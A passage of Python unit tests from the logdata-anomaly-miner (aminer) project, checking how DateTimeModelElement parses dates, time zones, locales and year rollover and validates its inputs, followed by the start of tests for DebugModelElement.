            self.compare_match_results(data, match, context, self.id_, self.path, data, expected, None)
            self.assertEqual(match.match_string, data)
            self.assertEqual(context.match_string, data)

    def test2wrong_date(self):
        """Invalid calendar values and inputs that do not fit the format must yield no match."""
        element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc)
        rejected = [
            b"32.03.2019 11:40:00: it still works",  # day 32
            b"01.13.2019 11:40:00: it still works",  # month 13
            b"01.01.00 11:40:00: it still works",  # two-digit year where %Y expects four digits
            b"29.02.2019 11:40:00: it still works",  # 29th February in a non-leap year
        ]
        for data in rejected:
            context = DummyMatchContext(data)
            self.compare_no_match_results(data, element.get_match_element(self.path, context), context)

        # the literal "T" the format requires is missing from the input
        data = b"07.02.2019 11:40:00: it still works"
        context = DummyMatchContext(data)
        element = DateTimeModelElement(self.id_, b"%d.%m.%YT%H:%M:%S", timezone.utc)
        self.compare_no_match_results(data, element.get_match_element(self.path, context), context)

        # %f is in the format but no fraction digits follow the "."
        data = b"07.02.2019 11:40:00.: it still works"
        context = DummyMatchContext(data)
        element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S.%f", timezone.utc)
        self.compare_no_match_results(data, element.get_match_element(self.path, context), context)

    def test3get_match_element_with_unclean_format_string(self):
        """A literal percent sign in the format is written as %% and must not be treated as a directive."""
        data = b"Date %d: 07.02.2018 11:40:00 UTC+0000: it still works"
        date = b"Date %d: 07.02.2018 11:40:00 UTC+0000"
        context = DummyMatchContext(data)
        element = DateTimeModelElement(self.id_, b"Date %%d: %d.%m.%Y %H:%M:%S%z", timezone.utc)
        match = element.get_match_element(self.path, context)
        self.compare_match_results(data, match, context, self.id_, self.path, date, 1518003600, None)

    def test4get_match_element_with_different_time_zones(self):
        """Check that numeric offsets, with and without a UTC/GMT prefix, are converted to the correct epoch value."""
        date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S%z", timezone.utc)
        # -12:00 written with either prefix gives the same epoch value (11:40 local time is 23:40 UTC).
        for data, date in [
                (b"07.02.2018 11:40:00 UTC-1200: it still works", b"07.02.2018 11:40:00 UTC-1200"),
                (b"07.02.2018 11:40:00 GMT-1200: it still works", b"07.02.2018 11:40:00 GMT-1200")]:
            match_context = DummyMatchContext(data)
            match_element = date_time_model_element.get_match_element(self.path, match_context)
            self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518046800, None)
        data = b"07.02.2018 11:40:00 UTC-12: it still works"
        date = b"07.02.2018 11:40:00 UTC-12"
        match_context = \
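DummyMatchContext(data)
        match_element = date_time_model_element.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518046800, None)
        # Remaining offsets: hour-only, HHMM and HH:MM spellings of the same offset all yield the same epoch value.
        offset_cases = [
            (b"07.02.2018 11:40:00 UTC-5: it still works", b"07.02.2018 11:40:00 UTC-5", 1518021600),
            (b"07.02.2018 11:40:00 UTC-0500: it still works", b"07.02.2018 11:40:00 UTC-0500", 1518021600),
            (b"07.02.2018 11:40:00-05:00: it still works", b"07.02.2018 11:40:00-05:00", 1518021600),
            (b"07.02.2018 11:40:00 UTC+0000: it still works", b"07.02.2018 11:40:00 UTC+0000", 1518003600),
            (b"07.02.2018 11:40:00 UTC+0100: it still works", b"07.02.2018 11:40:00 UTC+0100", 1518000000),
            (b"07.02.2018 11:40:00+01:00: it still works", b"07.02.2018 11:40:00+01:00", 1518000000),
            (b"07.02.2018 11:40:00 UTC+1400: it still works", b"07.02.2018 11:40:00 UTC+1400", 1517953200),
        ]
        for data, date, expected in offset_cases:
            match_context = DummyMatchContext(data)
            match_element = date_time_model_element.get_match_element(self.path, match_context)
            self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, expected, None)

    def test5get_match_element_with_different_text_locales(self):
        """Construct elements with several installed text_locale values and check that each one is created."""
        # The locales used here have to be installed on the test host. assertIsInstance gives the test an explicit
        # expectation; without it the test could only fail through an exception raised by the constructor.
        for text_locale in ("en_US.UTF-8", "de_AT.UTF-8", "de_AT.ISO-8859-1"):
            element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, text_locale)
            self.assertIsInstance(element, DateTimeModelElement)

    def test6text_locale_not_installed(self):
        """A text_locale that is not installed on the system makes the constructor raise locale.Error."""
        self.assertRaises(locale.Error, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, "af-ZA.UTF-8")

    def test7get_match_element_with_start_year(self):
        """Dates without a year are completed with start_year, so the same input maps to a different epoch per year."""
        data = b"07.02 11:40:00: it still works"
        date = b"07.02 11:40:00"
        date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=2017)
        match_context = DummyMatchContext(data)
        match_element = date_time_model_element.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1486467600, None)
        # Same input, start_year 2019: two years later.
        match_context = DummyMatchContext(data)
        date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=2019)
        match_element = date_time_model_element.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_,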
self.path, date, 1549539600, None)

    def test8get_match_element_without_start_year_defined(self):
        """Without start_year, a date that has no year is completed with the current year."""
        data = b"07.02 11:40:00: it still works"
        date = b"07.02 11:40:00"
        element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc)
        context = DummyMatchContext(data)
        # The expected value is derived from the wall clock year, so this test is sensitive to running across New Year.
        epoch_origin = datetime(1970, 1, 1, tzinfo=timezone.utc)
        expected = (datetime(datetime.now().year, 2, 7, 11, 40, tzinfo=timezone.utc) - epoch_origin).total_seconds()
        match = element.get_match_element(self.path, context)
        self.compare_match_results(data, match, context, self.id_, self.path, date, expected, None)

    def test9get_match_element_with_leap_start_year(self):
        """A leap start_year makes the 29th of February a valid date."""
        data = b"29.02 11:40:00: it still works"
        date = b"29.02 11:40:00"
        element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=2020)
        context = DummyMatchContext(data)
        match = element.get_match_element(self.path, context)
        self.compare_match_results(data, match, context, self.id_, self.path, date, 1582976400, None)

    def test10get_match_element_without_leap_start_year(self):
        """A non-leap start_year rejects the 29th of February."""
        data = b"29.02 11:40:00: it still works"
        element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=2019)
        context = DummyMatchContext(data)
        self.compare_no_match_results(data, element.get_match_element(self.path, context), context)

    def test11learn_new_start_year_with_start_year_set(self):
        """Crossing from 31.12 to 01.01 increments start_year on an element that had start_year configured."""
        start_year = 2020
        element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=start_year)
        # (input, matched text, expected epoch, start_year expected after the match)
        steps = [
            (b"31.12 23:59:00: it still works", b"31.12 23:59:00", 1609459140, start_year),
            (b"01.01 11:20:00: it still works", b"01.01 11:20:00", 1609500000, start_year + 1),
        ]
        for data, date, expected, expected_year in steps:
            context = DummyMatchContext(data)
            match = element.get_match_element(self.path, context)
            self.compare_match_results(data, match, context, self.id_, self.path, date, expected, None)
            self.assertEqual(element.start_year, expected_year)

    def test12learn_new_start_year_without_start_year_set(self):
        """Crossing from 31.12 to 01.01 increments the learned start_year when none was configured."""
        epoch_origin = datetime(1970, 1, 1, tzinfo=timezone.utc)
        this_year = datetime.now().year  # the element falls back to the wall clock year, as in test8
        element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc)

        data = b"31.12 23:59:00: it still works"
        date = b"31.12 23:59:00"
        context = DummyMatchContext(data)
        match = element.get_match_element(self.path, context)
        expected = (datetime(this_year, 12, 31, 23, 59, tzinfo=timezone.utc) - epoch_origin).total_seconds()
        self.compare_match_results(data, match, context, self.id_, self.path, date, expected, None)

        data = b"01.01 11:20:00: it still works"
        date = b"01.01 11:20:00"
        learned_year = element.start_year
        context = DummyMatchContext(data)
        match = element.get_match_element(self.path, context)
        expected = (datetime(this_year + 1, 1, 1, 11, 20, tzinfo=timezone.utc) - epoch_origin).total_seconds()
        self.compare_match_results(data, match, context, self.id_, self.path, date, expected, None)
        self.assertEqual(element.start_year, learned_year + 1)

    def \
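test13max_time_jump_seconds_in_time(self):
        """
        Test if the max_time_jump_seconds parameter works if the next date is in time.

        Warnings with unqualified timestamp year wraparound.
        """
        log_stream = self._capture_root_log()
        # try/finally so a failing assertion cannot leave the StringIO handler on the root logger for later tests.
        try:
            max_time_jump_seconds = 86400
            start_year = 2020
            date_time_model_element = DateTimeModelElement(
                self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=start_year, max_time_jump_seconds=max_time_jump_seconds)
            data = b"31.12 23:59:00: it still works"
            date = b"31.12 23:59:00"
            match_context = DummyMatchContext(data)
            match_element = date_time_model_element.get_match_element(self.path, match_context)
            self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1609459140, None)
            self.assertEqual(date_time_model_element.start_year, start_year)

            # 01.01 23:59:00 is exactly max_time_jump_seconds (86400 s) after 31.12 23:59:00, so the year wraps to 2021.
            data = b"01.01 23:59:00: it still works"
            date = b"01.01 23:59:00"
            match_context = DummyMatchContext(data)
            match_element = date_time_model_element.get_match_element(self.path, match_context)
            self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1609545540, None)
            self.assertEqual(date_time_model_element.start_year, start_year + 1)
            self.assertIn("WARNING:DEBUG:DateTimeModelElement unqualified timestamp year wraparound detected from 2021-01-01T23:59:00+00:00 to "
                          "2021-01-01T23:59:00+00:00", log_stream.getvalue())
        finally:
            self._restore_root_log()

    def test14max_time_jump_seconds_exceeded(self):
        """
        Test if the start_year is not updated, when the next date exceeds the max_time_jump_seconds.

        A time inconsistency warning must occur.
        """
        log_stream = self._capture_root_log()
        # try/finally so a failing assertion cannot leave the StringIO handler on the root logger for later tests.
        try:
            max_time_jump_seconds = 86400
            start_year = 2020
            date_time_model_element = DateTimeModelElement(
                self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=start_year, max_time_jump_seconds=max_time_jump_seconds)
            data = b"31.12 23:59:00: it still works"
            date = b"31.12 23:59:00"
            match_context = DummyMatchContext(data)
            match_element = date_time_model_element.get_match_element(self.path, match_context)
            self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1609459140, None)
            self.assertEqual(date_time_model_element.start_year, start_year)

            # 01.01 23:59:01 is one second beyond max_time_jump_seconds: the year is not advanced, the timestamp is still
            # interpreted in 2020 (1577923141) and a warning is logged.
            data = b"01.01 23:59:01: it still works"
            date = b"01.01 23:59:01"
            match_context = DummyMatchContext(data)
            match_element = date_time_model_element.get_match_element(self.path, match_context)
            self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1577923141, None)
            self.assertEqual(date_time_model_element.start_year, start_year)
            self.assertIn("WARNING:DEBUG:DateTimeModelElement time inconsistencies parsing b'01.01 23:59:01', expecting value around "
                          "1609459140. Check your settings!", log_stream.getvalue())

            # A fresh element with the same settings: both following dates lie within 2020 and must not touch start_year.
            date_time_model_element = DateTimeModelElement(
                self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=start_year, max_time_jump_seconds=max_time_jump_seconds)
            data = b"05.03 06:29:07: it still works"
            date = b"05.03 06:29:07"
            match_context = DummyMatchContext(data)
            match_element = date_time_model_element.get_match_element(self.path, match_context)
            self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1583389747, None)
            self.assertEqual(date_time_model_element.start_year, start_year)
            # NOTE(review): this re-checks the warning emitted above on the same, uncleared stream; it verifies nothing
            # about the fresh element. Presumably no warning is expected for the first parse of a new element - confirm.
            self.assertIn("WARNING:DEBUG:DateTimeModelElement time inconsistencies parsing b'01.01 23:59:01', expecting value around "
                          "1609459140. Check your settings!", log_stream.getvalue())

            data = b"29.02 07:24:02: it still works"
            date = b"29.02 07:24:02"
            match_context = DummyMatchContext(data)
            match_element = date_time_model_element.get_match_element(self.path, match_context)
            self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1582961042, None)
            self.assertEqual(date_time_model_element.start_year, start_year)
        finally:
            self._restore_root_log()

    def test15time_change_cest_cet(self):
        """Check if the time change from CET to CEST and vice versa works as expected, plus a few other zone names."""
        date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S%z", timezone.utc)
        # One element for all inputs; the zone name length changes between CET and CEST, which the match has to follow.
        zone_cases = [
            (b"24.03.2018 11:40:00 CET: it still works", b"24.03.2018 11:40:00 CET", 1521888000),
            (b"25.03.2018 11:40:00 CEST: it still works", b"25.03.2018 11:40:00 CEST", 1521970800),
            (b"27.10.2018 11:40:00 CEST: it still works", b"27.10.2018 11:40:00 CEST", 1540633200),
            (b"28.10.2018 11:40:00 CET: it still works", b"28.10.2018 11:40:00 CET", 1540723200),
            (b"27.10.2018 11:40:00 EST: it still works", b"27.10.2018 11:40:00 EST", 1540658400),
            (b"27.10.2018 11:40:00 PDT: it still works", b"27.10.2018 11:40:00 PDT", 1540665600),
            (b"27.10.2018 11:40:00 GMT: it still works", b"27.10.2018 11:40:00 GMT", 1540640400),
        ]
        for data, date, expected in zone_cases:
            match_context = DummyMatchContext(data)
            match_element = date_time_model_element.get_match_element(self.path, match_context)
            self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, expected, None)

    def test16same_timestamp_multiple_times(self):
        """Parsing the identical timestamp twice with one element yields the same match both times."""
        data = b"07.02.2019 11:40:00: it still works"
        date = b"07.02.2019 11:40:00"
        date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc)
        for _ in range(2):
            match_context = DummyMatchContext(data)
            match_element = date_time_model_element.get_match_element(self.path, match_context)
            self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None)

    def _capture_root_log(self):
        """Route the root logger into a fresh StringIO and return it, so log output of the element can be asserted on."""
        log_stream = StringIO()
        logging.basicConfig(stream=log_stream, level=logging.INFO)
        return log_stream

    def _restore_root_log(self):
        """Remove every root handler again and re-install the aminer loggers, so later tests log where they expect to."""
        for handler in logging.root.handlers[:]:
            logging.root.removeHandler(handler)
        initialize_loggers(self.aminer_config, getpwnam("aminer").pw_uid, getgrnam("aminer").gr_gid)

    def \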
test17date_before_unix_timestamps(self): """Check if timestamps before the unix timestamp are processed properly.""" data = b"01.01.1900 11:40:00: it still works" date = b"01.01.1900 11:40:00" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, -2208946800, None) def test18element_id_input_validation(self): """Check if element_id is validated.""" date_format = b"%d.%m.%Y %H:%M:%S" self.assertRaises(ValueError, DateTimeModelElement, "", date_format) # empty element_id self.assertRaises(TypeError, DateTimeModelElement, None, date_format) # None element_id self.assertRaises(TypeError, DateTimeModelElement, b"path", date_format) # bytes element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, True, date_format) # boolean element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, 123, date_format) # integer element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, 123.22, date_format) # float element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, {"id": "path"}, date_format) # dict element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, ["path"], date_format) # list element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, [], date_format) # empty list element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, (), date_format) # empty tuple element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, set(), date_format) # empty set element_id is not allowed def test19date_format_input_validation(self): """Check if date_format is validated and only valid values can be entered.""" allowed_format_specifiers = b"bdfHMmSsYz%" # check if allowed values do not raise any 
exception. format_specifiers = b"" for c in allowed_format_specifiers: format_specifiers += b"%" + str(chr(c)).encode() DateTimeModelElement(self.id_, b"%" + str(chr(c)).encode()) # check if all allowed values can not be used together. An exception should be raised, because of multiple month representations # and %s with non-second formats. self.assertRaises(ValueError, DateTimeModelElement, self.id_, format_specifiers) DateTimeModelElement(self.id_, format_specifiers.replace(b"%m", b"").replace(b"%s", b"")) DateTimeModelElement(self.id_, format_specifiers.replace(b"%b", b"").replace(b"%s", b"")) DateTimeModelElement(self.id_, b"%s%z%f") for c in allowed_format_specifiers.replace(b"s", b"").replace(b"z", b"").replace(b"f", b"").replace(b"%", b""): self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%s%" + str(chr(c)).encode()) # test non-existent specifiers for c in b"aceghijklnopqrtuvwxyABCDEFGIJKLNOPQRTUVWXZ": self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%" + str(chr(c)).encode()) # test multiple specifiers. % and z specifiers are allowed multiple times. 
DateTimeModelElement(self.id_, b"%%%z%z") for c in allowed_format_specifiers.replace(b"%", b"").replace(b"z", b""): self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%" + str(chr(c)).encode() + b"%" + str(chr(c)).encode()) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"") # empty date_format self.assertRaises(TypeError, DateTimeModelElement, self.id_, None) # None date_format self.assertRaises(TypeError, DateTimeModelElement, self.id_, "") # string date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, 123) # integer date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, 123.22) # float date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, True) # boolean date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, {"id": "path"}) # dict date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, ["path"]) # list date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, []) # empty list date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, ()) # empty tuple date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, set()) # empty set date_format is not allowed def test20time_zone_input_validation(self): """Check if time_zone is validated and only valid values can be entered.""" dtme = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S") self.assertEqual(dtme.time_zone, timezone.utc) DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc) for tz in pytz.all_timezones: DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", pytz.timezone(tz)) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", b"UTC") self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", "UTC") self.assertRaises(TypeError, DateTimeModelElement, self.id_, 
b"%d.%m.%Y %H:%M:%S", 1) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", 1.25) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", True) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", {"time_zone": timezone.utc}) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", [timezone.utc]) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", []) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", set()) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", ()) def test21text_locale_input_validation(self): """ Check if text_locale is validated and only valid values can be entered. An exception has to be raised if the locale is not installed on the system. """ DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, "en_US.UTF-8") DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, ("en_US", "UTF-8")) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, 1) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, 1.2) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, True) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, ["en_US", "UTF-8"]) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, {"en_US": "UTF-8"}) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, tuple("en_US.UTF-8")) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, set()) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, ()) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, ("en_US", "UTF-8", 
"de_AT", "UTF-8")) def test22start_year_input_validation(self): """Check if start_year is validated.""" dtme = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, None, None) self.assertEqual(dtme.start_year, datetime.now().year) DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, 2020) DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, -630) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, "2020") self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, True) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, 1.25) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, [2020]) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, []) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, {"key": 2020}) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, set()) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, ()) def test23max_time_jump_seconds_input_validation(self): """Check if max_time_jump_seconds is validated.""" dtme = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, None, None) self.assertEqual(dtme.max_time_jump_seconds, 86400) DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, 100000) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, -1) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, 0) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, "100000") self.assertRaises(TypeError, 
DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, True) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, 1.25) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, [2020]) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, []) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, {"key": 2020}) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, ()) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, set()) def test24get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S") data = b"07.02.2019 11:40:00: it still works" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 
{"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) def test25performance(self): # skipcq: PYL-R0201 """Test the performance of the implementation.""" run_test = False import_setup = """ import copy from unit.TestBase import DummyMatchContext from aminer.parsing.DateTimeModelElement import DateTimeModelElement times = 100000 """ string_no_z_setup = """ date = b"[18/Oct/2021:16:12:55" dtme = DateTimeModelElement("s0", b"[%d/%b/%Y:%H:%M:%S") """ string_z1_setup = """ date = b"[18/Oct/2021:16:12:55 UTC+0100" dtme = DateTimeModelElement("s0", b"[%d/%b/%Y:%H:%M:%S%z") """ string_z2_setup = """ date = b"[18/Oct/2021:16:12:55 +0000]" dtme = DateTimeModelElement("s0", b"[%d/%b/%Y:%H:%M:%S%z") """ end_setup = """ dummy_match_context = DummyMatchContext(date) dummy_match_context_list = [copy.deepcopy(dummy_match_context) for _ in range(times)] def run(): match_context = dummy_match_context_list.pop(0) dtme.get_match_element("match", match_context) """ no_z_setup = import_setup + string_no_z_setup + end_setup z1_setup = import_setup + string_z1_setup + end_setup z2_setup = import_setup + string_z2_setup + end_setup if run_test: import timeit times = 100000 print() print("Every date is run %d times." 
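% times)
            t = timeit.timeit(setup=no_z_setup, stmt="run()", number=times)
            print("No %z parameter ([18/Oct/2021:16:12:55): ", t)
            t = timeit.timeit(setup=z1_setup, stmt="run()", number=times)
            print("Date with %z parameter (18/Oct/2021:16:12:55 UTC+0100): ", t)
            t = timeit.timeit(setup=z2_setup, stmt="run()", number=times)
            print("Date with %z parameter (18/Oct/2021:16:12:55 +0000): ", t)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/DebugModelElementTest.py000066400000000000000000000110471437606560100301650ustar00rootroot00000000000000
import unittest
import sys
from _io import StringIO  # NOTE(review): io.StringIO is the public name; _io is the private implementation module.
from aminer.parsing.DebugModelElement import DebugModelElement
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase, DummyMatchContext


class DebugModelElementTest(TestBase):
    """Unittests for the DebugModelElement."""

    id_ = "debug"
    path = "path"

    def test1get_match_element_valid_match(self):
        """
        Parse data and check if the MatchContext was not changed.

        The DebugModelElement reports on stderr, both when it is constructed and on every get_match_element call,
        so sys.stderr is swapped for a StringIO to capture that output. The swap is undone in a ``finally`` block
        so that a failing assertion does not leave stderr redirected for the rest of the test run.
        """
        old_stderr = sys.stderr
        output = StringIO()
        sys.stderr = output
        try:
            debug_model_element = DebugModelElement(self.id_)
            self.assertEqual(output.getvalue(), "DebugModelElement %s added\n" % self.id_)
            output.seek(0)
            output.truncate(0)
            data = b"some data"
            match_context = DummyMatchContext(data)
            match_element = debug_model_element.get_match_element(self.path, match_context)
            self.assertEqual(
                output.getvalue(),
                'DebugModelElement path = "%s", unmatched = "%s"\n' % (match_element.get_path(), repr(match_context.match_data)))
            # The element matches the empty string and consumes nothing: match_string and match_object are both b"".
            self.compare_match_results(data, match_element, match_context, self.id_, self.path, b"", b"", None)
            output.seek(0)
            output.truncate(0)
            data = b"123 0x2a. [\"abc\"]:"
            match_context = DummyMatchContext(data)
            match_element = debug_model_element.get_match_element(self.path, match_context)
            self.assertEqual(
                output.getvalue(),
                'DebugModelElement path = "%s", unmatched = "%s"\n' % (match_element.get_path(), repr(match_context.match_data)))
            self.compare_match_results(data, match_element, match_context, self.id_, self.path, b"", b"", None)
        finally:
            sys.stderr = old_stderr

    def test2element_id_input_validation(self):
        """Check if element_id is validated: an empty string raises ValueError, every non-str type raises TypeError."""
        self.assertRaises(ValueError, DebugModelElement, "")  # empty element_id
        self.assertRaises(TypeError, DebugModelElement, None)  # None element_id
        self.assertRaises(TypeError, DebugModelElement, b"path")  # bytes element_id is not allowed
        self.assertRaises(TypeError, DebugModelElement, True)  # bool element_id is not allowed
        self.assertRaises(TypeError, DebugModelElement, 123)  # integer element_id is not allowed
        self.assertRaises(TypeError, DebugModelElement, 123.22)  # float element_id is not allowed
        self.assertRaises(TypeError, DebugModelElement, {"id": "path"})  # dict element_id is not allowed
        self.assertRaises(TypeError, DebugModelElement, ["path"])  # list element_id is not allowed
        self.assertRaises(TypeError, DebugModelElement, [])  # empty list element_id is not allowed
        self.assertRaises(TypeError, DebugModelElement, ())  # empty tuple element_id is not allowed
        self.assertRaises(TypeError, DebugModelElement, set())  # empty set element_id is not allowed

    def test3get_match_element_match_context_input_validation(self):
        """
        Check if an exception is raised, when other classes than MatchContext are used in get_match_element.

        MatchContext and DummyMatchContext are accepted; every other argument fails with AttributeError.
        """
        model_element = DebugModelElement(self.id_)
        data = b"abcdefghijklmnopqrstuvwxyz.!?"
        model_element.get_match_element(self.path, DummyMatchContext(data))
        model_element.get_match_element(self.path, MatchContext(data))
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None))
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, data)
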